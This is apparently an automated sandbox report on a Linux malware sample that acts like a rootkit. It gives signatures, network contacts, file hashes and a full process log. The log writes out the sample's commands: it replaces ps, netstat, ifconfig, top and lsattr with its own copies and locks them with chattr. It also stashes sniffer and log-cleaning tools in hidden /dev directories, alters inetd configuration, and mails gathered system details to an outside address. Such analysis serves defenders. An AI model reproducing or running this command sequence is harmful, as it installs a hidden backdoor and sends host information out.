Malware Analysis Report

2025-05-28 20:51

Sample ID 241021-gce2wa1erb
Target 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
SHA256 522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954
Tags
antivm defense_evasion discovery
score
6/10

Analysis Overview

score
6/10

SHA256

522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954

Threat Level: Shows suspicious behavior

The file 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

Reads CPU attributes

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 05:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

2s

Max time network

129s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 config-err-ESwDdV netplan_1iwncm7z snap-private-tmp ssh-GMXqXanC5C0k systemd-private-1020e78908244756830a6344ed1599c8-ModemManager.service-zJco20 systemd-private-1020e78908244756830a6344ed1599c8-bolt.service-lYyowF systemd-private-1020e78908244756830a6344ed1599c8-colord.service-J3gw7N systemd-private-1020e78908244756830a6344ed1599c8-systemd-resolved.service-9XdSFd systemd-private-1020e78908244756830a6344ed1599c8-systemd-timedated.service-hjXspn]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/bin/cat

[cat computer]

/bin/cat

[cat computer]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv swapfile sys tmp usr var vmlinuz vmlinuz.old]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/bin/grep

[grep inet]

/sbin/ifconfig

[/sbin/ifconfig]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/bin/cat

[cat computer]

/bin/cat

[cat computer]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.2:443 tcp

Files

/dev/rpm

/dev/last

/tmp/computer

/computer

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

debian9-armhf-20240611-en

Max time kernel

43s

Max time network

46s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/muKWvbYf /usr/bin/mail N/A
File opened for modification /tmp/muNx9kPc /usr/bin/mail N/A
File opened for modification /tmp/muXDXqrW /usr/bin/mail N/A
File opened for modification /tmp/muAm1Fpy /usr/bin/mail N/A
File opened for modification /tmp/muJkovri /usr/bin/mail N/A
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A
File opened for modification /tmp/muHKzgkJ /usr/bin/mail N/A
File opened for modification /tmp/mumtFuBb /usr/bin/mail N/A
File opened for modification /tmp/mutly4gS /usr/bin/mail N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-5c956e0ac026463aa2ef8d8a8e193d3d-systemd-timedated.service-d1hXTd]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGZ-0000Bq-Hs]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGZ-0000Bq-Hs]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGe-0000C3-BH]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root bin boot dev etc home lib lost+found media mnt opt proc root run sbin srv sys tmp usr var]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGf-0000C6-0x]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGu-0000De-5L]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGu-0000De-5L]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGz-0000Dk-71]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jH0-0000Dm-5G]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-armhf-20240611-en-5 udp

Files

/dev/rpm

/dev/last

/tmp/computer
SHA512 5ff5a3f40890bb51f3b31a9f75c983d7d49b1b05418414eebbad9ba2ede078cdf0aad1a67c8daed9aeb838cdde36b95e3b2291c02d4da713e7eec3ba25f67dd3

/tmp/computer

MD5 beca71bf200edc891d6cb69d7b2ad1ba
SHA1 e04133e19fcfe726f03334d83b2a9bd7a975dde3
SHA256 086e6365276103262e726b90d8a2cedd03c0a78de639164f4595a54f56df43e6
SHA512 0226fd1ce42c7587e8efcc86441b4e1325084e1485ec027051a39e654a9d4cddbeac777091bd2ea06d54aeaedf1cb9ee9d5956d897a6108dc6af9ed6206e5ca2

/var/spool/exim4/input/1t2jGZ-0000Bq-Hs-D

MD5 04d6a3d969c2001a707229d25c1e5a54
SHA1 2d305db37cb21fc4305988cc9cb1a007d1653dab
SHA256 6314b2af40496bd52b71f14088c338219a7eee7e71e19b6f3a70a827058079e5
SHA512 6e903a8c9f684fbdbc6fc52ec37d52390b41dbc828ef268e56a22c20d87976474a421e43d5f48decfdfbbe9e5015a60473684732cf5c0d701a956019427aee14

/var/spool/exim4/input/hdr.734

MD5 642d2ca083b30aabfb924228669826ba
SHA1 62332316777d867f7055f9ede36accaa41e6c376
SHA256 d5198dcdd66ef29a462d7a0ca23f482fc694892f115ae0c2a895113aba457f38
SHA512 699594f61bbb81a068cc418f7ad6057b0b2d658ad035a7a5ff8e43e54d60b56d9e4b380a97261f8265c3b188468ffac444c511cfecbacdd8821abd7c4fb31b0b

/var/spool/exim4/msglog/1t2jGZ-0000Bq-Hs

MD5 0a67dba8634383d9a020657165ed6246
SHA1 dc1d544d98ce18ea2d791575f49fbaefac7ce601
SHA256 42dba61c335e888563772fe41833d1f958ee1fe1ee9897ae3c44099dd06b9247
SHA512 4b5e12ebe57d11d2114dd8b3f168a70c1c1e644fd9ff8a8c4279672f5e401fb49bddeb6103080e62c7c14b417caedc1c01877cbab7a5dbc31b2f65c92b5ffd9d

/var/spool/exim4/msglog/1t2jGZ-0000Bq-Hs

MD5 5adf3799176832807650590ead2e4faa
SHA1 286239e8e277fdaad8ef33625bf216c92b4964f8
SHA256 a3a9d425fa78a1cb6dfc6cc4a9fd444fa74d80d02e2791b7b582216bd941c829
SHA512 3ceaa4369ecb09c02803d6808934b5eefa98b92e9001d91d8d3591979a6b87fc69872cb7904e05c21cd4b7730c0ff05c4621cbbacb427637cb544c0cf92bad3a

/var/spool/exim4/input/1t2jGe-0000C3-BH-D

MD5 5d86fc62d58aac35ec2adb902c721c8d
SHA1 6fc280225884d40c2af5942517831e6a86bfdc5d
SHA256 cc33f7dbd9a5e42f823e4a0893de55f038d32ed78f8cb8fdd53c2af4f4f1ed48
SHA512 b4d408635489f3237fd47816a3444efaaed578729f8ec2e063513d6bf6e9b8a3319c55187c762e347ee9a21f641eba9ffccd3e673829fdc77e4fc8ab25f7b5b6

/var/spool/exim4/input/hdr.747

MD5 c8e99586637333b21d4397542e3d8d70
SHA1 45b797b654842514e6b08efa9c35b3d5a0af9c87
SHA256 22426f31739622ccf91c09382d510c217bfac0773e3c24520a370ec706d42e94
SHA512 5c4fda1f146d49ac930d8ebf6e44b808ca402a09e8238850b92c14779c1c6add580be72fca3ee025e9e9d9e2becc8b949211696bed143b4a0395c6f2de224518

/var/spool/exim4/msglog/1t2jGe-0000C3-BH

MD5 4171ae09d7a80a45afa3fecbcb74216c
SHA1 7a87f95d19dba8e01a2dca4b59d7b7b234dde834
SHA256 e47c7972cb11225609e79e9c02adaf39a62bb9fe10963b9f79be1c92660e98ae
SHA512 322f0cbd16c7830cd8201bb82cc1af320e839a0b0478f8d1d49015d745976b626127fce176e658e6a7e64fd4392deae918705b3f342c8812160a9c5133963fec

/var/spool/exim4/input/1t2jGf-0000C6-0x-D

MD5 74010548ac93e5ce693a5ee89f6f7442
SHA1 1df747c757009cbacb7950f14cd1344f0994a025
SHA256 99737a5db171c52c310195796ca986ba5ba037846d66593d897e14f8e32bfbde
SHA512 97dc9f3ee2b7828f588dd7b0c70b01b794ce3af666055a47b6979c9e83cec46c6a487ef3a5a89b9b386b1c6e1ed35c84902633ae9d0b11b90508c3f86e5e8ecc

/var/spool/exim4/input/hdr.750

MD5 b36396191962c8ff98f4e3a65f2cc184
SHA1 311e4a388603c07f329980ca8214cc41eecc4a4c
SHA256 b032df5783bc42a422784edd109adda718b4b9ae0e95aaa1764980eefd0170e3
SHA512 a30eb5fff9792e57a2a268ece286310bc91f53fd884be2015d1b8500e0dc57c82eb6359e51c316528c3d27bef4c3be888053ae329c01153daa61b2b561306d47

/var/spool/exim4/msglog/1t2jGf-0000C6-0x

MD5 7eb525b2f5925e500f263d63a8c4d888
SHA1 e8eaa45d9264e72bfa8e902e392a411cc557ffa2
SHA256 7bd1330bc0087bd0e8f70d188166a3dd50af85f0fbff402eaa9ab0a7fe299930
SHA512 fb6b263679995f2ac3a5753bdbd689aa22cc569515f34d02599a0da9c51adc8bb2ba4cb4a9e933ca2ca031a46062884e2ea1b4b68f8ef5c7962810db44d823fc

/var/spool/exim4/input/hdr.741

MD5 b4bb07d4ab5cf2daff59efbbbf74d411
SHA1 25c73b1bc6f009adfe1cd0261cb9bd53804813e2
SHA256 b9b32bbb2140ec3304a8edb22c6f136742d59e2c7840835e6ca67fb60c407c93
SHA512 88464b566f336e558f1b64d4b694a417964d89f9145a7119250ba971dbf04a4d7ea071d7bdcd22b2c34b664bacfc6ac6c93cdcc61556272750141f62643575bf

/var/spool/exim4/msglog/1t2jGe-0000C3-BH

MD5 84c1d9e4069f06a09380cbb157bdb091
SHA1 d9492f2e9d041c8587e209c67eebbada9e6fa81a
SHA256 81ec2a26956e8893c29c62a6c46fa9698668bb43a83e2f442d9b50b2ea2c5357
SHA512 2e9fa162e8483e431eb73476a8ac68414693d4377a7d337e911659d819b01818c0dda9b9274948c19e88e3a61edb1d69c7d75846ee143ec7d36963b24ff715f8

/var/mail/user

MD5 381d9647046c21f355a5eff683bf91b0
SHA1 bdc7d162fb546dcee8c515826adcbf7ef059d30e
SHA256 82d239c94ec78cb6146c8c5d0f8940c3348c16652727161de3378f97a3600add
SHA512 fa8000453102ff4a9415b7adf6940994f3cb029abf3350e0b36cddd18cb70781b341851d2c28b3afb8d7ed49b283df020866f9d7a58d05edcc731b3baf6d2395

/var/spool/exim4/input/1t2jGf-0000C6-0x-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t2jGf-0000C6-0x

MD5 693b33a41b3ccd965c73506fcc6b9d50
SHA1 2a7a7c9b9ddd3fa87e2c54c23a84eea092dcff88
SHA256 e72b0287606a8c19d81e32bb2bb93aba8848fae4a51b5c0ace29d256109288cb
SHA512 416c0ea18ed91ddefe9c360a721ba289c8e4e558ccc3e0b5e4c467760470774925e5e6262f1636d4582864bc7c210e832eb83fe3cbf2058821e6a0d4a3407669

/computer

MD5 bc55489b7eef4f411a35f4ae10aa68ea
SHA1 cda58593c6342db85e49e37a37fed8682765e292
SHA256 5e79826c4725a7171fe669842f570965d1601b0517bc8c2c946b731214eff722
SHA512 480a5cfb21c6f0e0efb57fc24fb4c71837c1a8af4b74cc65cf5d4adb0d6110dbd6fddc2528736f05976eb4fa80947efe5e7c92d055a0fc6c5fd0e4b14669972c

/computer

MD5 5228b507c439b311ec17f1f7cecb2cbc
SHA1 d1421f7f58b029aa62e84a177773e92a438b793e
SHA256 fe6f264bda476516279fba819fed1ba52e3d09e4a96c17ca8b3a4fbfdc2f72d9
SHA512 1e2daa285a65b4deba7059116ebc90c63a25060dfed2c8f209c079498cc6cbb61b49f2dcf52545ba6e24698cf1fc55f9b5758c571c03ffda08d86417d20b795e

/computer

MD5 6fa7e032dde2f249236a37d4430090eb
SHA1 88ac99ae05862194050801b3cd5fafe81dee3c60
SHA256 8352c21d38716b6bd5ee449b415d798aaf3c6886fb8d6874f8b3e7b45a3a922d
SHA512 a902ed6f6b36070b64b5966e8d9d8e4fbae781572ee097abf7940d1dc69461b6d0d5e51fe92073400ea221e9e988a096d324c2ee387f22b2189f0ca01d4887ed

/var/spool/exim4/input/1t2jGu-0000De-5L-D

MD5 19032970fffe0262da69360d2d7d5377
SHA1 d5571509329c702579570844e910f7d4f4d6c684
SHA256 316ce7b0d72254a078d7aa2ec156cead0c9ce4e7178837b3fca3dc03b46d4086
SHA512 d57b280c789b1bdaf28550d65b1a66c1fa1504cfc645b35a92ff09dc50f5f5c1b9e548c8233b5996e428b909ff41732279136db8a37d401d5ac452ad9085b734

/var/spool/exim4/input/hdr.846

MD5 12a853cf58c142d32b635e3837f9b74b
SHA1 c2f578ff5a94316447ea8c24aab31e0f00d4fb48
SHA256 b16dab7991ccd06f3f9ba404b6bb03f15beafe9fb8702a28e48c8456c3d8cb58
SHA512 d690bc8f8fd8c7e9333036350e6ef9019749363840992143dbaa4a5652d23d8def4f65ff1ec2c9e64b7c6dfd67c04e05afe95c8cd46f4f2c29a22f1d26a6122a

/var/spool/exim4/msglog/1t2jGu-0000De-5L

MD5 68ca470c63cf8030f236682b58c3168c
SHA1 57911934483281828c0adb6e8b1381bda058a905
SHA256 7fc1e8c40a0e8d0231367863360c5fc36be4d920a5220441f41aca306b411789
SHA512 8bdba3e2165a46ea4eb43fd670dbc53cb55311dd6732b7da6bda9fcb133d1bbdd0391afaacc5a8e794778458819088894de1a31f582370204dedcc7e94a52452

/var/spool/exim4/msglog/1t2jGu-0000De-5L

MD5 dc11bf0ca544f2e6ff3479fe2de147b9
SHA1 e966f069c2dd36df32c475e243ffcdff8c120e3f
SHA256 33e96c5a23e5dc5c79cd8c316334120817ffb05dec33665cbcb6819c2ef11017
SHA512 ad72737bdfc36b89bbd73dec8e499cc13c9a088eee7250e9189bc7c9be47252bf7a478e14967e4fc95b4cef2ddbca5a7b41381e778b6481eda862a8a30724302

/var/spool/exim4/input/1t2jGz-0000Dk-71-D

MD5 dec5999fe0df6e0110c9df7cec156ded
SHA1 9d9e0ed1d530c7557053ff278c28e558a50fde13
SHA256 72932bab21f122d4ce2054963bde7f28e158e24056476e5a18f84fe5094dd916
SHA512 e7b32482e91b7876ab537c8e32cddab37446e0ef651748036a025bd97d6f31d2ee26edc290c78e4ca66ef371f3e28acf46d989f02011efda0c490a7e34c3c6eb

/var/spool/exim4/input/hdr.852

MD5 da37c36be403556e761595d8c9a3df04
SHA1 1da8551464ca0488b1b5dff6b1f21ae0062204b1
SHA256 6d2e65d70362df6f0424c7d4f6aaabb491fd6a6693eb4876b134f52dc8d2ddf5
SHA512 1f561ead8b3cb392d075ff1678c11959a40f35931fd1d458235c95612ca0d381f04c78ff1d02895529ddfa0c801a0c3d80dbf2594dbb1161ba119448ab164982

/var/spool/exim4/msglog/1t2jGz-0000Dk-71

MD5 a08934f7c07a2ef72232d6756ca06135
SHA1 c1e9ca1f37cbcd79f3877907e1d24a8eb3050a23
SHA256 3bd452fe1ec879169029f53aacb690d561cdff982475ee802d11062c257cf553
SHA512 67323eb561eb75f460c7e6b1597ec5a3fd3f50fa3c988e2fd22abe3187764998b08bca9a7c427c9c12ff640952b1f806d62615b5f5c2714347cd17de0d2eb92c

/var/spool/exim4/input/1t2jH0-0000Dm-5G-D

MD5 383c941049bed7e39c6cbffacfdf8957
SHA1 8213fd53acceb217387e5fee336cc610ff2d62c8
SHA256 b595e24f2ca55be513f3c2b4e7bcd2016584b09106dacffacb866c3293dfb07a
SHA512 a049abb4ebacd027b871f2f2c87cf920ec5a9cac7fe3cb64235826cdc62f733fd2b5a04276a1973a545596d350a3e3e384b835a50ee0c2e3ed54fb64f3f0f2fc

/var/spool/exim4/input/hdr.854

MD5 e6fb2e4d8b461caf8f84e03a53f68394
SHA1 6f2fed334e67a2e1776b84d92be98aaefca67a1b
SHA256 965d898f32cd1dd5fd5a64f5b67b73c52e0414b148e35d0154cf5f630643f2d4
SHA512 53c7bbbbc9a44d376822323be5a588f995e144ce8dd00e437318aab8540e65f993155b862e348c8a37e7827290a429b342f335e726257a28ab1a9f7f985a3dcc

/var/spool/exim4/msglog/1t2jH0-0000Dm-5G

MD5 d823cafece34e05003dc46bb58ac5b80
SHA1 943f0f894a736c34b21facfa5072dd5643144a4a
SHA256 845605bda62cf128e7923d1ae278371e96572e4033233683a89aa1ab2096dcf3
SHA512 a9f2bd4701791d39b5f010f624c3ec13771422edeee0c90117a29d8cdedf86554f3f9096a8497409a29b68aa76ce867415a878c5004bb96e78e153ed9e9ef603

/var/spool/exim4/input/hdr.849

MD5 e959e5d39dc1cb1fff10790475c4f8bf
SHA1 31577f3e57125345537b71b864c73d5a9527af5f
SHA256 07a2fc31212b6f991c32aec7a56b0b690ab7a8e2015c45d64c4391a07e14dbc5
SHA512 0b05152c0a6ba45a9738ad1dfa69fc597cac07518043706e5e7b9ee046ab16ad0d15c5945d7502acb9ec0bfa3b993c2c79669c985bca08f1b4bdc8aa88f1f0a1

/var/spool/exim4/msglog/1t2jGz-0000Dk-71

MD5 07fadc2d200cb2874d581e4a100555f3
SHA1 6756a02aa6d6645a8013f9d9e0f1dfe1c99f6a30
SHA256 a75f889d709804189d8ee2ecfb34a4368171c19caa15a53ffe6d257d8729221e
SHA512 45ce30344bc8040ecdf0ee0b546e73ef4f494466cb1d77b3b39bf04177d1b990888232597571fb1516deddbb0ae8d8eb2c938db7f9316c26b4ddc8a33a45e49b

/var/mail/user

MD5 db4873366da252523c084eafceb7cc26
SHA1 02934de39f3704014c4567ec140ab032d9f5ca97
